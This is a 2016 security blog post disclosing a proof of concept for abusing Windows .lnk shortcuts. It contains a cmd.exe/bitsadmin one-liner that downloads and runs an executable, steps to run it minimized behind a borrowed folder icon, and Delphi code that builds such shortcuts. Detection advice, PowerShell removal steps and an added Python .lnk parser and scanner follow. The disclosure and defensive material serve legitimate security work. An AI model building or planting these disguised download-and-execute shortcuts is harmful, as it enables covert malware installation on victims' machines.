Shortcuts as entry points for malware (PoC)

December 21, 2016

Our security researcher and Lead Developer (@DarkCoderSc) came across a way of installing malware on Microsoft Windows using the well-known shortcut (.lnk) mechanism that nearly everybody uses and blindly trusts.

Because of its very nature (a shortcut is a data file, not an executable, and the programs it launches are legitimate, signed Windows binaries), it is quite hard to detect. Removal might be even more difficult: deleting the shortcut does not undo whatever it already downloaded and ran.

Preface

Description

To describe this threat, we shall first describe a native Windows program, the BITSAdmin tool (bitsadmin.exe), which has been embedded in Windows since Windows XP SP2. Microsoft has marked it deprecated since Windows 7 in favour of the PowerShell BITS cmdlets, but it still ships with current Windows versions. See Microsoft's BITSAdmin documentation on MSDN for how it is used and what it is for.



Basically, this command line tool was designed to create download (and upload) jobs and to monitor their progress. Offering it on the command line is dangerous from a security standpoint: bitsadmin.exe is signed by Microsoft and implicitly trusted by antivirus products, so a complete file download can be requested in a single command line without any attacker-supplied code. Defenders still have something to look for: jobs in progress are visible with "bitsadmin /list /allusers /verbose", and BITS job activity is recorded in the Microsoft-Windows-Bits-Client/Operational event log.


Example of a BITSAdmin command (it downloads the given URL into %temp%\setup.exe):


bitsadmin /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe

Now let's use this command line tool to weaponize a new Windows shortcut.

DIY, the manual way


Right click somewhere in Explorer (for example on free space on your desktop), then choose New > Shortcut.



Enter the following command line:

cmd.exe /C "%windir%\System32\bitsadmin.exe /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe & %temp%\setup.exe"



Then save it.

Now right click on shortcut, then select Properties.



Switch the 'Run' option to 'Minimized', so that the console window does not draw attention when the shortcut is opened.



Finally change the icon to a harmless-looking one (for example a folder icon).
To make sure the icon survives when the shortcut is shared, pick it from shell32.dll, which is present on every Windows installation.


Note: shell32.dll is not the only icon source on a Windows system: ieframe.dll, imageres.dll, pnidui.dll, wmploc.dll etc. also contain many useful icons.





Your malicious shortcut is now ready.

DIY, programmatically (Delphi)



program MakeLnk;

{$APPTYPE CONSOLE}

// Requires a Unicode Delphi (2009 or later), where String is UnicodeString
// and the PWideChar casts below are valid.
uses
  Windows, ActiveX, ShlObj, ComObj;

// Writes a .lnk whose real target is cmd.exe and whose arguments make
// bitsadmin.exe download fileUrl into %temp% and run it (the same command
// line as the manual method). destFile is the path of the shortcut to create.
function MaliciousLnk(const fileUrl, destFile: String): Boolean;
var
  cObject   : IUnknown;
  shellLink : IShellLink;
  PFile     : IPersistFile;
  Cmd       : String;
begin
  Result := False;
  CoInitialize(nil);
  try
    cObject   := CreateComObject(CLSID_ShellLink);
    shellLink := cObject as IShellLink;
    PFile     := cObject as IPersistFile;

    // %temp% is left unexpanded on purpose: cmd.exe expands it at run time
    Cmd := '/C "c:\windows\system32\bitsadmin.exe /transfer downloader /priority normal "'
         + fileUrl + '" %temp%\tmp.exe & %temp%\tmp.exe"';

    shellLink.SetDescription('www.phrozensoft.com');   // tooltip shown on hover
    shellLink.SetPath('cmd.exe');                       // the real target
    shellLink.SetArguments(PWideChar(Cmd));
    shellLink.SetShowCmd(SW_SHOWMINNOACTIVE);           // "Run: Minimized"
    shellLink.SetWorkingDirectory('%windir%\system32\');
    shellLink.SetIconLocation('shell32.dll', 1);        // borrow a stock icon

    // IPersistFile.Save writes the binary .lnk to disk
    Result := PFile.Save(PWideChar(destFile), False) = S_OK;
  finally
    CoUninitialize();
  end;
end;

begin
  if ParamCount < 2 then
    Writeln('usage: MakeLnk <url> <output.lnk>')
  else if MaliciousLnk(ParamStr(1), ParamStr(2)) then
    Writeln('shortcut written to ', ParamStr(2))
  else
    Writeln('failed to write shortcut');
end.


Note that this technique works from Windows XP SP2 up to Windows 10 (latest build at the time of writing), Windows Server editions included.
Using this method, an attacker does not even need to write a downloader to evade antivirus detection: no attacker-supplied executable is delivered, only a .lnk file, and the download and execution are carried out by cmd.exe and bitsadmin.exe, both legitimate signed Windows binaries.


bitsadmin.exe is just one example of what a Windows shortcut can be abused for; basically any malicious action that can be expressed as a command line is possible, such as:


Note: For regular Windows users who do not need PowerShell (enabled by default), we recommend removing the feature. This mitigates malware that relies on PowerShell to install its payload, but not the bitsadmin-based example above, which uses only cmd.exe. Be aware that on Windows 8.1 and Windows 10 the optional feature is named 'Windows PowerShell 2.0', and unchecking it removes only the legacy 2.0 engine (still worthwhile, since attackers start that engine to bypass the logging of newer versions); Windows PowerShell 5 remains installed.


Proceed as follows to remove the PowerShell feature (it can be reverted at any time):


Open the Programs and Features utility (the native Windows uninstaller window) and click 'Turn Windows features on or off'



Scroll down to the PowerShell entry ('Windows PowerShell 2.0' on Windows 8.1 and 10), then uncheck it



After a reboot, the PowerShell feature should be removed from your system.

Conclusion


Never blindly trust shortcuts you encounter. They might hide malicious commands that your favourite antivirus software will not detect, since every program involved is a legitimate Windows binary. The end result might be a compromised or locked system.
Take the time to open the properties of an unknown shortcut and read the command line it would execute: a target of cmd.exe or powershell.exe with a long argument string, or a 'Run: Minimized' setting combined with a stock Windows icon, are the signs described above. Keep in mind that the Target box of the properties dialog only shows a limited number of characters, and attackers pad the arguments with whitespace to push the real command out of view, so a parser that reads the .lnk file itself is more reliable than the dialog.
If you have any doubt, remove it!
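The check recommended above, automated, as an added example that is not part of the original post: a small Python parser for the Shell Link (.lnk) format that recovers exactly the fields the manual and Delphi methods set (target relative path, arguments, working directory, icon location and the 'Run: Minimized' ShowCommand), plus a scoring function that flags the PoC's traits and a directory scanner. The builder exists only to construct parser input: it writes the header and StringData sections and omits the LinkTargetIDList/LinkInfo sections Windows needs to resolve a target, so its output is not a working shortcut. The indicator list, the sample shortcuts and the assumption that non-Unicode strings are cp1252 are mine; the command line is the post's own.

```python
"""Added example (not the post's code): build a minimal Shell Link (.lnk) that carries
the PoC command line, and parse .lnk files to recover what a shortcut would run."""
import os
import struct

# LinkFlags bits of the 76-byte ShellLinkHeader (MS-SHLLINK)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SW_SHOWMINNOACTIVE = 7  # ShowCommand value behind the "Run: Minimized" setting

# StringData sections follow the header (and optional IDList/LinkInfo) in this fixed order
_STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                  ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                  ("icon_location", HAS_ICON_LOCATION))

# The post's command line, including the download URL from its PoC
POC_ARGUMENTS = ('/C "%windir%\\System32\\bitsadmin.exe /transfer downloader /priority normal '
                 'https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe '
                 '%temp%\\setup.exe & %temp%\\setup.exe"')

# Indicator list chosen for this example: signed Windows binaries a shortcut can abuse
LOLBIN_TOKENS = ("bitsadmin", "cmd.exe", "powershell", "mshta", "wscript", "cscript",
                 "certutil", "regsvr32", "rundll32")

def build_lnk(relative_path, arguments="", working_dir="", icon_location="", name="",
              icon_index=0, show_command=SW_SHOWMINNOACTIVE, unicode=True,
              id_list=b"", link_info=b""):
    """Constructed .lnk bytes for the parser: header + StringData only, so Windows could
    not resolve it.  id_list / link_info are opaque filler to exercise section skipping."""
    values = {"name": name, "relative_path": relative_path, "working_dir": working_dir,
              "arguments": arguments, "icon_location": icon_location}
    flags = ((IS_UNICODE if unicode else 0) | (HAS_LINK_TARGET_ID_LIST if id_list else 0)
             | (HAS_LINK_INFO if link_info else 0))
    for field, bit in _STRING_FIELDS:
        if values[field]:
            flags |= bit
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize, IconIndex,
    # ShowCommand, HotKey, Reserved1, Reserved2, Reserved3
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0,
                         icon_index, show_command, 0, 0, 0, 0)
    body = b""
    if id_list:
        body += struct.pack("<H", len(id_list)) + id_list          # IDListSize excludes itself
    if link_info:
        body += struct.pack("<I", len(link_info) + 4) + link_info  # LinkInfoSize includes itself
    for field, bit in _STRING_FIELDS:
        if flags & bit:
            text = values[field]
            body += struct.pack("<H", len(text))                   # CountCharacters, no terminator
            body += text.encode("utf-16-le" if unicode else "cp1252")
    return header + body

def parse_lnk(data):
    """Return ShowCommand, IconIndex and the StringData fields of a .lnk as a dict."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    icon_index, show_command = struct.unpack_from("<iI", data, 56)
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:   # the resolved target lives here; skipped, not decoded
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"show_command": show_command, "icon_index": icon_index}
    width = 2 if flags & IS_UNICODE else 1
    for field, bit in _STRING_FIELDS:
        info[field] = ""
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            if len(raw) != count * width:
                raise ValueError(f"truncated {field} string")
            pos += 2 + count * width
            # non-Unicode strings use the system ANSI code page; cp1252 is assumed here
            info[field] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return info

def shortcut_findings(info):
    """Reasons a parsed shortcut resembles the PoC; an empty list means nothing stood out."""
    command = (info["relative_path"] + " " + info["arguments"]).lower()
    findings = [f"command line invokes {t}" for t in LOLBIN_TOKENS if t in command]
    if "%temp%" in command:
        findings.append("drops to or runs from %temp%")
    if findings and info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window set to run minimized")
    if findings and info["icon_location"].lower().endswith(".dll"):
        findings.append("icon borrowed from a DLL to disguise the target")
    return findings

def scan_directory(root):
    """Map every .lnk under root to its findings; non-shortcuts are reported, not skipped."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(".lnk"):
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    try:
                        report[path] = shortcut_findings(parse_lnk(fh.read()))
                    except ValueError as exc:
                        report[path] = [f"unparseable: {exc}"]
    return report
```

Call scan_directory on a downloads folder or a desktop to get a per-file list of findings. The arguments string is read in full from the file, so the whitespace-padding trick that hides the command in the properties dialog does not help the attacker here. The parser deliberately does not decode the LinkTargetIDList, so for a shortcut created by Windows the resolved target path is not recovered; the relative path and the arguments, which is where the PoC's command lives, are.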
